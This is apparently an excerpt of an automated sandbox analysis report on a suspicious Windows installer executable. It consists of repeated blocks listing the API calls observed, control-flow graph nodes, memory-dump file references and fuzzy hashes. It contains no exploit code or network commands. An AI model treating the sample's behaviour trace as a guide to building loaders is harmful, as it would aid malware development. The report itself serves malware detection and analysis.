                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 1000187B
                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 100018A0
                                                                                                                        • Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,00001020), ref: 100022B8
                                                                                                                        • Part of subcall function 10002645: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B7
                                                                                                                        • Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020,00000000,10001731,00000000), ref: 100015CD
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2138429838.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2138407292.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2138443925.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2138472692.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_10000000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Global$Free$Alloc$Librarylstrcpy
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1791698881-3916222277
                                                                                                                      • Opcode ID: 3820d06b2144ad54ebddf171c2200ffff0f7cb9118403e7eb0aa07fa6a87fa13
                                                                                                                      • Instruction ID: d353a68b508970880cf9150dbe01e0f77130c4103e9cfdf2e47557ee24e57a3c
                                                                                                                      • Opcode Fuzzy Hash: 3820d06b2144ad54ebddf171c2200ffff0f7cb9118403e7eb0aa07fa6a87fa13
                                                                                                                      • Instruction Fuzzy Hash: 5E31BF75804241AAFB14DF749CC9BDA37E8FF053D0F158065FA0A9A08FDF74A9848761

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 1090 405c59-405c65 1091 405c66-405c9a GetTickCount GetTempFileNameW 1090->1091 1092 405ca9-405cab 1091->1092 1093 405c9c-405c9e 1091->1093 1095 405ca3-405ca6 1092->1095 1093->1091 1094 405ca0 1093->1094 1094->1095
                                                                                                                      APIs
                                                                                                                      • GetTickCount.KERNEL32 ref: 00405C77
                                                                                                                      • GetTempFileNameW.KERNELBASE(0040A300,?,00000000,?,?,?,00000000,0040329E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00405C92
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CountFileNameTempTick
                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                      • API String ID: 1716503409-678247507
                                                                                                                      • Opcode ID: cb5392dd6a621c673a260bf01be68eb44352edb4da8eb2a8f5e3bee52ca40139
                                                                                                                      • Instruction ID: f587d7e23cd8e79aba5dfcc9fd1c49406dd64d8aef4a88ed345cfe548f7336ea
                                                                                                                      • Opcode Fuzzy Hash: cb5392dd6a621c673a260bf01be68eb44352edb4da8eb2a8f5e3bee52ca40139
                                                                                                                      • Instruction Fuzzy Hash: BAF06D76A00708BFEB008B59ED05A9FBBA8EB91750F10403AE900F7180E6B49A548B68

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 1096 4063bf-4063df GetSystemDirectoryW 1097 4063e1 1096->1097 1098 4063e3-4063e5 1096->1098 1097->1098 1099 4063f6-4063f8 1098->1099 1100 4063e7-4063f0 1098->1100 1102 4063f9-406428 wsprintfW LoadLibraryW 1099->1102 1100->1099 1101 4063f2-4063f4 1100->1101 1101->1102
                                                                                                                      APIs
                                                                                                                      • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063D6
                                                                                                                      • wsprintfW.USER32 ref: 00406411
                                                                                                                      • LoadLibraryW.KERNELBASE(?), ref: 00406421
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                      • String ID: %s%S.dll
                                                                                                                      • API String ID: 2200240437-2744773210
                                                                                                                      • Opcode ID: ebb0f172caec6dc837d07c814eb63f6b49a53cdbd21dad16a8e1c45d76cddad1
                                                                                                                      • Instruction ID: 897e15d25a7328917349fb3201836a7725472686ce540cc24b04093dc9f4d60a
                                                                                                                      • Opcode Fuzzy Hash: ebb0f172caec6dc837d07c814eb63f6b49a53cdbd21dad16a8e1c45d76cddad1
                                                                                                                      • Instruction Fuzzy Hash: 81F0BB7051011997DB14AB68EE4DE9B366CEB00305F11447E9946F20D1EB7CDA69CBE8
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00405AB4: CharNextW.USER32(?,?,0042FA70,0040A300,00405B28,0042FA70,0042FA70,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\grrezORe7h.exe"), ref: 00405AC2
                                                                                                                        • Part of subcall function 00405AB4: CharNextW.USER32(00000000), ref: 00405AC7
                                                                                                                        • Part of subcall function 00405AB4: CharNextW.USER32(00000000), ref: 00405ADF
                                                                                                                      • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 00401612
                                                                                                                        • Part of subcall function 00405683: CreateDirectoryW.KERNELBASE(?,0040A300,C:\Users\user\AppData\Local\Temp\), ref: 004056C6
                                                                                                                      • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Vilkaarets,?,00000000,000000F0), ref: 00401645
                                                                                                                      Strings
                                                                                                                      • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Vilkaarets, xrefs: 00401638
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                      • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Vilkaarets
                                                                                                                      • API String ID: 1892508949-3638503147
                                                                                                                      • Opcode ID: 52ccde5ccace11c1ffa7f9329ea0f8b807946ffbe1ca103446376b1a06abf216
                                                                                                                      • Instruction ID: 2a65e9898054e9c842dee46b5c7982ab048171bb6952f998b4aca48d6bd22bb3
                                                                                                                      • Opcode Fuzzy Hash: 52ccde5ccace11c1ffa7f9329ea0f8b807946ffbe1ca103446376b1a06abf216
                                                                                                                      • Instruction Fuzzy Hash: 96119331504504EBCF20BFA4CD4599E36A1EF44368B25093BEA46B62F2DA394A819E5D
                                                                                                                      APIs
                                                                                                                      • IsWindowVisible.USER32(?), ref: 00405157
                                                                                                                      • CallWindowProcW.USER32(?,?,?,?), ref: 004051A8
                                                                                                                        • Part of subcall function 00404165: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404177
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$CallMessageProcSendVisible
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3748168415-3916222277
                                                                                                                      • Opcode ID: 2462b0bd117cba3fac64a39f9691424f836373fd1b16367001445a14a5683044
                                                                                                                      • Instruction ID: 0347cf6c5ba133ca8876b90c0990050b6d60b288702db1d6ba02f1018bbb4e5f
                                                                                                                      • Opcode Fuzzy Hash: 2462b0bd117cba3fac64a39f9691424f836373fd1b16367001445a14a5683044
                                                                                                                      • Instruction Fuzzy Hash: 4C017C71A00609ABDF214F51DD80FAB3B26EB84754F104036FA047E1E1C77A8C92DE69
                                                                                                                      APIs
                                                                                                                      • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00401FEE
                                                                                                                        • Part of subcall function 004051B4: lstrlenW.KERNEL32(0042C248,00000000,0041D820,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                                        • Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,0042C248,00000000,0041D820,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                                        • Part of subcall function 004051B4: lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,0041D820,74DF23A0), ref: 0040520F
                                                                                                                        • Part of subcall function 004051B4: SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                                        • Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                                        • Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                                        • Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FFF
                                                                                                                      • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 0040207C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 334405425-0
                                                                                                                      • Opcode ID: d6ec45678292224ccfbfce22950c847036d7a08cdbcb07fa7d0387c0f9533a57
                                                                                                                      • Instruction ID: 561ed2f99fcd8f3c69216c61aae9e950b585f3ecd418fa9455324ea25216acba
                                                                                                                      • Opcode Fuzzy Hash: d6ec45678292224ccfbfce22950c847036d7a08cdbcb07fa7d0387c0f9533a57
                                                                                                                      • Instruction Fuzzy Hash: 8221A731900209EBDF20AF65CE48A9E7E71BF00354F20427BF510B51E1CBBD8A81DA5D
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,0000049E,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                                                      • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004024CD
                                                                                                                      • RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 004024E0
                                                                                                                      • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsuC465.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Enum$CloseOpenValue
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 167947723-0
                                                                                                                      • Opcode ID: 42b2dd53c8b5802947a3dab0b58a0a50b760338acaf8adbf9a4fd88f57d55a7c
                                                                                                                      • Instruction ID: caa0a88e983a87845293d3a09aded013c5498a2120ee6ea3f3930af667db2d56
                                                                                                                      • Opcode Fuzzy Hash: 42b2dd53c8b5802947a3dab0b58a0a50b760338acaf8adbf9a4fd88f57d55a7c
                                                                                                                      • Instruction Fuzzy Hash: 9FF08171A00204ABEB209F65DE8CABF767CEF80354B10803FF405B61D0DAB84D419B69
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,0000049E,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                                                      • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?), ref: 0040245B
                                                                                                                      • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsuC465.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseOpenQueryValue
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3677997916-0
                                                                                                                      • Opcode ID: 684252ed4cb5f75002efccf4c3d89688e5a32529c12b8521bce5fdd085325f04
                                                                                                                      • Instruction ID: 28617f4b1a8802b5017de0243b5a45cf97da40b04a50325282b533cdbf166070
                                                                                                                      • Opcode Fuzzy Hash: 684252ed4cb5f75002efccf4c3d89688e5a32529c12b8521bce5fdd085325f04
                                                                                                                      • Instruction Fuzzy Hash: 64115E31911205EBDB14CFA4DA489AEB7B4EF44354B20843FE446B72D0DAB89A41EB59
                                                                                                                      APIs
                                                                                                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                      • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3850602802-0
                                                                                                                      • Opcode ID: 71800ff5d752955c4261f1e4e44e66a702dae3e8c0882f1cfb99089304b670a7
                                                                                                                      • Instruction ID: cd3aabbb77ee63ed71f9921c47df44d3aa6e588553b0b950a072bc92d791a3e5
                                                                                                                      • Opcode Fuzzy Hash: 71800ff5d752955c4261f1e4e44e66a702dae3e8c0882f1cfb99089304b670a7
                                                                                                                      • Instruction Fuzzy Hash: 2101F4316202209FE7095B389D05B6A3698E710319F10863FF851F62F1DA78DC428B4C
                                                                                                                      APIs
                                                                                                                      • GetModuleHandleA.KERNEL32(?,?,00000020,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
                                                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00406458
                                                                                                                        • Part of subcall function 004063BF: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063D6
                                                                                                                        • Part of subcall function 004063BF: wsprintfW.USER32 ref: 00406411
                                                                                                                        • Part of subcall function 004063BF: LoadLibraryW.KERNELBASE(?), ref: 00406421
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2547128583-0
                                                                                                                      • Opcode ID: f58656703257d3684848e4558ce263f5efe09ac277fa21959b5ddbdc7fcd416a
                                                                                                                      • Instruction ID: 5d7b52194fecd52e31197542c52f699420a2dcfb6f4997f05ddeecd74f4f3bdc
                                                                                                                      • Opcode Fuzzy Hash: f58656703257d3684848e4558ce263f5efe09ac277fa21959b5ddbdc7fcd416a
                                                                                                                      • Instruction Fuzzy Hash: 70E0863660422066D61057705E44D3763AC9E94704306043EFA46F2041DB78DC32AA6E
                                                                                                                      APIs
                                                                                                                      • ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DF2
                                                                                                                      • EnableWindow.USER32(00000000,00000000), ref: 00401DFD
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$EnableShow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1136574915-0
                                                                                                                      • Opcode ID: bfed12c821a079857a615332bdb98fb1c84882728095731f13ed5530d444e0e9
                                                                                                                      • Instruction ID: 46dfe73b81ae29a5099323896a5bc3e3d9df575198e3285abdeb67f25c429c8d
                                                                                                                      • Opcode Fuzzy Hash: bfed12c821a079857a615332bdb98fb1c84882728095731f13ed5530d444e0e9
                                                                                                                      • Instruction Fuzzy Hash: 76E08C326005009BCB10AFB5AA4999D3375DF90369710007BE402F10E1CABC9C409A2D
                                                                                                                      APIs
                                                                                                                      • GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\grrezORe7h.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
                                                                                                                      • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: File$AttributesCreate
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 415043291-0
                                                                                                                      • Opcode ID: c97765c4049bc943dbf434cc8e3c5f5e58d45e95167aa4d8b6d1a3ab64a9aeda
                                                                                                                      • Instruction ID: a29eaa7254a97888a18cbfd792fe15e84c6d283973f4e4682f27fdddc38ff468
                                                                                                                      • Opcode Fuzzy Hash: c97765c4049bc943dbf434cc8e3c5f5e58d45e95167aa4d8b6d1a3ab64a9aeda
                                                                                                                      • Instruction Fuzzy Hash: 71D09E71654601AFEF098F20DE16F2E7AA2FB84B00F11562CB682940E0DAB158199B15
                                                                                                                      APIs
